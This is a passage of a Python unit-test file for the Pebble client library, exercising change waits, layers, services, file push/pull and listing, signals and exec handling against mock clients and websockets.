self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
('GET', '/v1/changes/70/wait', {'timeout': '2.000s'}, None),
])
self.assertEqual(self.time.time(), 6)
def test_wait_change_timeout_polled(self):
# Trigger polled mode
self.client.responses.append(pebble.APIError({}, 404, "Not Found", "not found"))
change = build_mock_change_dict()
change['ready'] = False
for _ in range(3):
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
with self.assertRaises(pebble.TimeoutError) as cm:
self.client.wait_change('70', timeout=3, delay=1)
self.assertIsInstance(cm.exception, pebble.Error)
self.assertIsInstance(cm.exception, TimeoutError)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '3.000s'}, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
])
self.assertEqual(self.time.time(), 3)
def test_wait_change_error(self):
change = build_mock_change_dict()
change['err'] = 'Some kind of service error'
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
# wait_change() itself shouldn't raise an error
response = self.client.wait_change('70')
self.assertEqual(response.id, '70')
self.assertEqual(response.err, 'Some kind of service error')
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def test_add_layer(self):
okay_response = {
"result": True,
"status": "OK",
"status-code": 200,
"type": "sync"
}
self.client.responses.append(okay_response)
self.client.responses.append(okay_response)
self.client.responses.append(okay_response)
self.client.responses.append(okay_response)
layer_yaml = """
services:
foo:
command: echo bar
override: replace
"""[1:]
layer = pebble.Layer(layer_yaml)
self.client.add_layer('a', layer)
self.client.add_layer('b', layer.to_yaml())
self.client.add_layer('c', layer.to_dict())
self.client.add_layer('d', layer, combine=True)
def build_expected(label, combine):
return {
'action': 'add',
'combine': combine,
'label': label,
'format': 'yaml',
'layer': layer_yaml,
}
self.assertEqual(self.client.requests, [
('POST', '/v1/layers', None, build_expected('a', False)),
('POST', '/v1/layers', None, build_expected('b', False)),
('POST', '/v1/layers', None, build_expected('c', False)),
('POST', '/v1/layers', None, build_expected('d', True)),
])
def test_add_layer_invalid_type(self):
with self.assertRaises(TypeError):
self.client.add_layer('foo', 42)
with self.assertRaises(TypeError):
self.client.add_layer(42, 'foo')
# combine is a keyword-only arg (should be combine=True)
with self.assertRaises(TypeError):
self.client.add_layer('foo', {}, True)
def test_get_plan(self):
plan_yaml = """
services:
foo:
command: echo bar
override: replace
"""[1:]
self.client.responses.append({
"result": plan_yaml,
"status": "OK",
"status-code": 200,
"type": "sync"
})
plan = self.client.get_plan()
self.assertEqual(plan.to_yaml(), plan_yaml)
self.assertEqual(len(plan.services), 1)
self.assertEqual(plan.services['foo'].command, 'echo bar')
self.assertEqual(plan.services['foo'].override, 'replace')
self.assertEqual(self.client.requests, [
('GET', '/v1/plan', {'format': 'yaml'}, None),
])
def test_get_services_all(self):
self.client.responses.append({
"result": [
{
"current": "inactive",
"name": "svc1",
"startup": "disabled"
},
{
"current": "active",
"name": "svc2",
"startup": "enabled"
}
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
services = self.client.get_services()
self.assertEqual(len(services), 2)
self.assertEqual(services[0].name, 'svc1')
self.assertEqual(services[0].startup, pebble.ServiceStartup.DISABLED)
self.assertEqual(services[0].current, pebble.ServiceStatus.INACTIVE)
self.assertEqual(services[1].name, 'svc2')
self.assertEqual(services[1].startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(services[1].current, pebble.ServiceStatus.ACTIVE)
self.assertEqual(self.client.requests, [
('GET', '/v1/services', None, None),
])
def test_get_services_names(self):
self.client.responses.append({
"result": [
{
"current": "inactive",
"name": "svc1",
"startup": "disabled"
},
{
"current": "active",
"name": "svc2",
"startup": "enabled"
}
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
services = self.client.get_services(['svc1', 'svc2'])
self.assertEqual(len(services), 2)
self.assertEqual(services[0].name, 'svc1')
self.assertEqual(services[0].startup, pebble.ServiceStartup.DISABLED)
self.assertEqual(services[0].current, pebble.ServiceStatus.INACTIVE)
self.assertEqual(services[1].name, 'svc2')
self.assertEqual(services[1].startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(services[1].current, pebble.ServiceStatus.ACTIVE)
self.client.responses.append({
"result": [
{
"current": "active",
"name": "svc2",
"startup": "enabled"
}
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
services = self.client.get_services(['svc2'])
self.assertEqual(len(services), 1)
self.assertEqual(services[0].name, 'svc2')
self.assertEqual(services[0].startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(services[0].current, pebble.ServiceStatus.ACTIVE)
self.assertEqual(self.client.requests, [
('GET', '/v1/services', {'names': 'svc1,svc2'}, None),
('GET', '/v1/services', {'names': 'svc2'}, None),
])
def test_pull_text(self):
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/etc/hosts"
127.0.0.1 localhost # """ + b'\xf0\x9f\x98\x80\nfoo\r\nbar' + b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="response"
{
"result": [{"path": "/etc/hosts"}],
"status": "OK",
"status-code": 200,
"type": "sync"
}
--01234567890123456789012345678901--
""",
))
content = self.client.pull('/etc/hosts').read()
self.assertEqual(content, '127.0.0.1 localhost # 😀\nfoo\r\nbar')
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'read', 'path': '/etc/hosts'},
{'Accept': 'multipart/form-data'}, None),
])
def test_pull_binary(self):
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/etc/hosts"
127.0.0.1 localhost # """ + b'\xf0\x9f\x98\x80\nfoo\r\nbar' + b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="response"
{
"result": [{"path": "/etc/hosts"}],
"status": "OK",
"status-code": 200,
"type": "sync"
}
--01234567890123456789012345678901--
""",
))
content = self.client.pull('/etc/hosts', encoding=None).read()
self.assertEqual(content, b'127.0.0.1 localhost # \xf0\x9f\x98\x80\nfoo\r\nbar')
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'read', 'path': '/etc/hosts'},
{'Accept': 'multipart/form-data'}, None),
])
def test_pull_path_error(self):
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="response"
{
"result": [
{"path": "/etc/hosts", "error": {"kind": "not-found", "message": "not found"}}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
--01234567890123456789012345678901--
""",
))
with self.assertRaises(pebble.PathError) as cm:
self.client.pull('/etc/hosts')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.kind, 'not-found')
self.assertEqual(cm.exception.message, 'not found')
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'read', 'path': '/etc/hosts'},
{'Accept': 'multipart/form-data'}, None),
])
def test_pull_protocol_errors(self):
self.client.responses.append(({'Content-Type': 'ct'}, b''))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(str(cm.exception),
"expected Content-Type 'multipart/form-data', got 'ct'")
self.client.responses.append(({'Content-Type': 'multipart/form-data'}, b''))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertEqual(str(cm.exception), "invalid boundary ''")
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/bad"
bad path
--01234567890123456789012345678901--
""",
))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertEqual(str(cm.exception), "path not expected: /bad")
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/etc/hosts"
bad path
--01234567890123456789012345678901--
""",
))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertEqual(str(cm.exception), 'no "response" field in multipart body')
def test_push_str(self):
self._test_push_str('content 😀\nfoo\r\nbar')
def test_push_text(self):
self._test_push_str(io.StringIO('content 😀\nfoo\r\nbar'))
def _test_push_str(self, source):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', source)
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content \xf0\x9f\x98\x80\nfoo\r\nbar')
self.assertEqual(req, {
'action': 'write',
'files': [{'path': '/foo/bar'}],
})
def test_push_bytes(self):
self._test_push_bytes(b'content \xf0\x9f\x98\x80\nfoo\r\nbar')
def test_push_binary(self):
self._test_push_bytes(io.BytesIO(b'content \xf0\x9f\x98\x80\nfoo\r\nbar'))
def _test_push_bytes(self, source):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', source)
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content \xf0\x9f\x98\x80\nfoo\r\nbar')
self.assertEqual(req, {
'action': 'write',
'files': [{'path': '/foo/bar'}],
})
def test_push_all_options(self):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', 'content', make_dirs=True, permissions=0o600,
user_id=12, user='bob', group_id=34, group='staff')
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content')
self.assertEqual(req, {
'action': 'write',
'files': [{
'path': '/foo/bar',
'make-dirs': True,
'permissions': '600',
'user-id': 12,
'user': 'bob',
'group-id': 34,
'group': 'staff',
}],
})
def test_push_uid_gid(self):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', 'content', user_id=12, group_id=34)
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content')
self.assertEqual(req, {
'action': 'write',
'files': [{
'path': '/foo/bar',
'user-id': 12,
'group-id': 34,
}],
})
def test_push_path_error(self):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar", "error": {"kind": "not-found", "message": "not found"}}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
with self.assertRaises(pebble.PathError) as cm:
self.client.push('/foo/bar', 'content')
self.assertEqual(cm.exception.kind, 'not-found')
self.assertEqual(cm.exception.message, 'not found')
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content')
self.assertEqual(req, {
'action': 'write',
'files': [{'path': '/foo/bar'}],
})
def _parse_write_multipart(self, content_type, body):
ctype, options = cgi.parse_header(content_type)
self.assertEqual(ctype, 'multipart/form-data')
boundary = options['boundary']
# We have to manually write the Content-Type with boundary, because
# email.parser expects the entire multipart message with headers.
parser = email.parser.BytesFeedParser()
parser.feed(b'Content-Type: multipart/form-data; boundary='
+ boundary.encode('utf-8') + b'\r\n\r\n')
for b in body:
# With the "memory efficient push" changes, body is an iterable.
parser.feed(b)
message = parser.close()
req = None
filename = None
content = None
for part in message.walk():
name = part.get_param('name', header='Content-Disposition')
if name == 'request':
req = json.loads(part.get_payload())
elif name == 'files':
# decode=True, ironically, avoids decoding bytes to str
content = part.get_payload(decode=True)
filename = part.get_filename()
return (req, filename, content)
def test_list_files_path(self):
self.client.responses.append({
"result": [
{
'path': '/etc/hosts',
'name': 'hosts',
'type': 'file',
'size': 123,
'permissions': '644',
'last-modified': '2021-01-28T14:37:04.291517768+13:00',
'user-id': 12,
'user': 'bob',
'group-id': 34,
'group': 'staff',
},
{
'path': '/etc/nginx',
'name': 'nginx',
'type': 'directory',
'permissions': '755',
'last-modified': '2020-01-01T01:01:01.000000+13:00',
},
],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
infos = self.client.list_files('/etc')
self.assertEqual(len(infos), 2)
self.assertEqual(infos[0].path, '/etc/hosts')
self.assertEqual(infos[0].name, 'hosts')
self.assertEqual(infos[0].type, pebble.FileType.FILE)
self.assertEqual(infos[0].size, 123)
self.assertEqual(infos[0].permissions, 0o644)
self.assertEqual(infos[0].last_modified, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(infos[0].user_id, 12)
self.assertEqual(infos[0].user, 'bob')
self.assertEqual(infos[0].group_id, 34)
self.assertEqual(infos[0].group, 'staff')
self.assertEqual(infos[1].path, '/etc/nginx')
self.assertEqual(infos[1].name, 'nginx')
self.assertEqual(infos[1].type, pebble.FileType.DIRECTORY)
self.assertEqual(infos[1].size, None)
self.assertEqual(infos[1].permissions, 0o755)
self.assertEqual(infos[1].last_modified, datetime_nzdt(2020, 1, 1, 1, 1, 1, 0))
self.assertIs(infos[1].user_id, None)
self.assertIs(infos[1].user, None)
self.assertIs(infos[1].group_id, None)
self.assertIs(infos[1].group, None)
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'list', 'path': '/etc'}, None),
])
def test_list_files_pattern(self):
self.client.responses.append({
"result": [],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
infos = self.client.list_files('/etc', pattern='*.conf')
self.assertEqual(len(infos), 0)
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'list', 'path': '/etc', 'pattern': '*.conf'}, None),
])
def test_list_files_itself(self):
self.client.responses.append({
"result": [],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
infos = self.client.list_files('/etc', itself=True)
self.assertEqual(len(infos), 0)
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'list', 'path': '/etc', 'itself': 'true'}, None),
])
def test_make_dir_basic(self):
self.client.responses.append({
"result": [{'path': '/foo/bar'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.make_dir('/foo/bar')
req = {'action': 'make-dirs', 'dirs': [{
'path': '/foo/bar',
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_make_dir_all_options(self):
self.client.responses.append({
"result": [{'path': '/foo/bar'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.make_dir('/foo/bar', make_parents=True, permissions=0o600,
user_id=12, user='bob', group_id=34, group='staff')
req = {'action': 'make-dirs', 'dirs': [{
'path': '/foo/bar',
'make-parents': True,
'permissions': '600',
'user-id': 12,
'user': 'bob',
'group-id': 34,
'group': 'staff',
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_make_dir_error(self):
self.client.responses.append({
"result": [{
'path': '/foo/bar',
'error': {
'kind': 'permission-denied',
'message': 'permission denied',
},
}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
with self.assertRaises(pebble.PathError) as cm:
self.client.make_dir('/foo/bar')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.kind, 'permission-denied')
self.assertEqual(cm.exception.message, 'permission denied')
def test_remove_path_basic(self):
self.client.responses.append({
"result": [{'path': '/boo/far'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.remove_path('/boo/far')
req = {'action': 'remove', 'paths': [{
'path': '/boo/far',
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_remove_path_recursive(self):
self.client.responses.append({
"result": [{'path': '/boo/far'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.remove_path('/boo/far', recursive=True)
req = {'action': 'remove', 'paths': [{
'path': '/boo/far',
'recursive': True,
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_remove_path_error(self):
self.client.responses.append({
"result": [{
'path': '/boo/far',
'error': {
'kind': 'generic-file-error',
'message': 'some other error',
},
}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
with self.assertRaises(pebble.PathError) as cm:
self.client.remove_path('/boo/far')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.kind, 'generic-file-error')
self.assertEqual(cm.exception.message, 'some other error')
def test_send_signal_name(self):
self.client.responses.append({
'result': True,
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.send_signal('SIGHUP', ['s1', 's2'])
self.assertEqual(self.client.requests, [
('POST', '/v1/signals', None, {'signal': 'SIGHUP', 'services': ['s1', 's2']}),
])
@unittest.skipUnless(hasattr(signal, 'SIGHUP'), 'signal constants not present on Windows')
def test_send_signal_number(self):
self.client.responses.append({
'result': True,
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.send_signal(signal.SIGHUP, ['s1', 's2'])
self.assertEqual(self.client.requests, [
('POST', '/v1/signals', None, {'signal': 'SIGHUP', 'services': ['s1', 's2']}),
])
def test_send_signal_type_error(self):
with self.assertRaises(TypeError):
self.client.send_signal('SIGHUP', 'should-be-a-list')
with self.assertRaises(TypeError):
self.client.send_signal('SIGHUP', [1, 2])
@unittest.skipIf(sys.platform == 'win32', "Unix sockets don't work on Windows")
class TestSocketClient(unittest.TestCase):
def test_socket_not_found(self):
client = pebble.Client(socket_path='does_not_exist')
with self.assertRaises(pebble.ConnectionError) as cm:
client.get_system_info()
self.assertIsInstance(cm.exception, pebble.Error)
def test_real_client(self):
shutdown, socket_path = fake_pebble.start_server()
try:
client = pebble.Client(socket_path=socket_path)
info = client.get_system_info()
self.assertEqual(info.version, '3.14.159')
change_id = client.start_services(['foo'], timeout=0)
self.assertEqual(change_id, '1234')
with self.assertRaises(pebble.APIError) as cm:
client.start_services(['bar'], timeout=0)
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.code, 400)
self.assertEqual(cm.exception.status, 'Bad Request')
self.assertEqual(cm.exception.message, 'service "bar" does not exist')
finally:
shutdown()
class TestExecError(unittest.TestCase):
def test_init(self):
e = pebble.ExecError(['foo'], 42, 'out', 'err')
self.assertEqual(e.command, ['foo'])
self.assertEqual(e.exit_code, 42)
self.assertEqual(e.stdout, 'out')
self.assertEqual(e.stderr, 'err')
def test_str(self):
e = pebble.ExecError(['x'], 1, None, None)
self.assertEqual(str(e), "non-zero exit code 1 executing ['x']")
e = pebble.ExecError(['x'], 1, 'only-out', None)
self.assertEqual(str(e), "non-zero exit code 1 executing ['x'], stdout='only-out'")
e = pebble.ExecError(['x'], 1, None, 'only-err')
self.assertEqual(str(e), "non-zero exit code 1 executing ['x'], stderr='only-err'")
e = pebble.ExecError(['a', 'b'], 1, 'out', 'err')
self.assertEqual(str(e), "non-zero exit code 1 executing ['a', 'b'], "
+ "stdout='out', stderr='err'")
def test_str_truncated(self):
e = pebble.ExecError(['foo'], 2, 'longout', 'longerr')
e.STR_MAX_OUTPUT = 5
self.assertEqual(str(e), "non-zero exit code 2 executing ['foo'], "
+ "stdout='longo' [truncated], stderr='longe' [truncated]")
class MockWebsocket:
def __init__(self):
self.sends = []
self.receives = []
def send_binary(self, b):
self.sends.append(('BIN', b))
def send(self, s):
self.sends.append(('TXT', s))
def recv(self):
return self.receives.pop(0)
def shutdown(self):
pass
class TestExec(unittest.TestCase):
def setUp(self):
self.client = MockClient()
self.time = MockTime()
time_patcher = unittest.mock.patch('ops.pebble.time', self.time)
time_patcher.start()
self.addCleanup(time_patcher.stop)
def add_responses(self, change_id, exit_code, change_err=None):
task_id = 'T' + change_id # create a task_id based on change_id
self.client.responses.append({
'change': change_id,
'result': {'task-id': task_id},
})
change = build_mock_change_dict(change_id)
change['tasks'][0]['data'] = {'exit-code': exit_code}
if change_err is not None:
change['err'] = change_err
self.client.responses.append({
'result': change,
})
stdio = MockWebsocket()
stderr = MockWebsocket()
control = MockWebsocket()
self.client.websockets = {
(task_id, 'stdio'): stdio,
(task_id, 'stderr'): stderr,
(task_id, 'control'): control,
}
return (stdio, stderr, control)
def build_exec_data(
self, command, environment=None, working_dir=None, timeout=None,
user_id=None, user=None, group_id=None, group=None, combine_stderr=False):
return {
'command': command,
'environment': environment or {},
'working-dir': working_dir,
'timeout': '{:.3f}s'.format(timeout) if timeout is not None else None,
'user-id': user_id,
'user': user,
'group-id': group_id,
'group': group,
'split-stderr': not combine_stderr,
}
def test_arg_errors(self):
with self.assertRaises(TypeError):
self.client.exec('foo')
with self.assertRaises(ValueError):
self.client.exec([])
with self.assertRaises(ValueError):
self.client.exec(['foo'], stdin='s', encoding=None)
with self.assertRaises(ValueError):
self.client.exec(['foo'], stdin=b's')
with self.assertRaises(TypeError):
self.client.exec(['foo'], stdin=123)
with self.assertRaises(ValueError):
self.client.exec(['foo'], stdout=io.StringIO(), stderr=io.StringIO(),
combine_stderr=True)
def test_no_wait_call(self):
self.add_responses('123', 0)
with self.assertWarns(ResourceWarning) as cm:
process = self.client.exec(['true'])
del process
self.assertEqual(str(cm.warning), 'ExecProcess instance garbage collected '
+ 'without call to wait() or wait_output()')
def test_wait_exit_zero(self):
self.add_responses('123', 0)
process = self.client.exec(['true'])
self.assertIsNotNone(process.stdout)
self.assertIsNotNone(process.stderr)
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['true'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
def test_wait_exit_nonzero(self):
self.add_responses('456', 1)
process = self.client.exec(['false'])
with self.assertRaises(pebble.ExecError) as cm:
process.wait()
self.assertEqual(cm.exception.command, ['false'])
self.assertEqual(cm.exception.exit_code, 1)
self.assertEqual(cm.exception.stdout, None)
self.assertEqual(cm.exception.stderr, None)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['false'])),
('GET', '/v1/changes/456/wait', {'timeout': '4.000s'}, None),
])
def test_wait_timeout(self):
self.add_responses('123', 0)
process = self.client.exec(['true'], timeout=2)
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['true'], timeout=2)),
('GET', '/v1/changes/123/wait', {'timeout': '3.000s'}, None),
])
def test_wait_other_args(self):
self.add_responses('123', 0)
process = self.client.exec(
['true'],
environment={'K1': 'V1', 'K2': 'V2'},
working_dir='WD',
user_id=1000,
user='bob',
group_id=1000,
group='staff',
)
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(
command=['true'],
environment={'K1': 'V1', 'K2': 'V2'},
working_dir='WD',
user_id=1000,
user='bob',
group_id=1000,
group='staff',
)),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
def test_wait_change_error(self):
self.add_responses('123', 0, change_err='change error!')
process = self.client.exec(['true'])
with self.assertRaises(pebble.ChangeError) as cm:
process.wait()
self.assertEqual(cm.exception.err, 'change error!')
self.assertEqual(cm.exception.change.id, '123')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['true'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
def test_send_signal(self):
_, _, control = self.add_responses('123', 0)
process = self.client.exec(['server'])
process.send_signal('SIGHUP')
num_sends = 1
if hasattr(signal, 'SIGHUP'): # Skip this part on Windows
process.send_signal(1)
process.send_signal(signal.SIGHUP)
num_sends += 2
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['server'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(len(control.sends), num_sends)
self.assertEqual(control.sends[0][0], 'TXT')
self.assertEqual(json.loads(control.sends[0][1]),
{'command': 'signal', 'signal': {'name': 'SIGHUP'}})
if hasattr(signal, 'SIGHUP'):
self.assertEqual(control.sends[1][0], 'TXT')
self.assertEqual(json.loads(control.sends[1][1]),
{'command': 'signal', 'signal': {'name': signal.Signals(1).name}})
self.assertEqual(control.sends[2][0], 'TXT')
self.assertEqual(json.loads(control.sends[2][1]),
{'command': 'signal', 'signal': {'name': 'SIGHUP'}})
def test_wait_output(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'Python 3.8.10\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['python3', '--version'])
out, err = process.wait_output()
self.assertEqual(out, 'Python 3.8.10\n')
self.assertEqual(err, '')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['python3', '--version'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_combine_stderr(self):
stdio, _, _ = self.add_responses('123', 0)
stdio.receives.append(b'invalid time interval\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['sleep', 'x'], combine_stderr=True)
out, err = process.wait_output()
self.assertEqual(out, 'invalid time interval\n')
self.assertIsNone(err)
self.assertIsNone(process.stderr)
exec_data = self.build_exec_data(['sleep', 'x'], combine_stderr=True)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, exec_data),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_bytes(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'Python 3.8.10\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['python3', '--version'], encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'Python 3.8.10\n')
self.assertEqual(err, b'')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['python3', '--version'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_exit_nonzero(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append('{"command":"end"}')
stderr.receives.append(b'file not found: x\n')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['ls', 'x'])
out, err = process.wait_output()
self.assertEqual(out, '')
self.assertEqual(err, 'file not found: x\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['ls', 'x'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_exit_nonzero_combine_stderr(self):
stdio, _, _ = self.add_responses('123', 0)
stdio.receives.append(b'file not found: x\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['ls', 'x'], combine_stderr=True)
out, err = process.wait_output()
self.assertEqual(out, 'file not found: x\n')
self.assertIsNone(err)
exec_data = self.build_exec_data(['ls', 'x'], combine_stderr=True)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, exec_data),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_send_stdin(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO\nBAR\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'], stdin='foo\nbar\n')
out, err = process.wait_output()
self.assertEqual(out, 'FOO\nBAR\n')
self.assertEqual(err, '')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'foo\nbar\n'),
('TXT', '{"command":"end"}'),
])
def test_wait_output_send_stdin_bytes(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO\nBAR\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'], stdin=b'foo\nbar\n',
encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'FOO\nBAR\n')
self.assertEqual(err, b'')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'foo\nbar\n'),
('TXT', '{"command":"end"}'),
])
def test_wait_output_bad_command(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'Python 3.8.10\n')
stdio.receives.append('not json') # bad JSON should be ignored
stdio.receives.append('{"command":"foo"}') # unknown command should be ignored
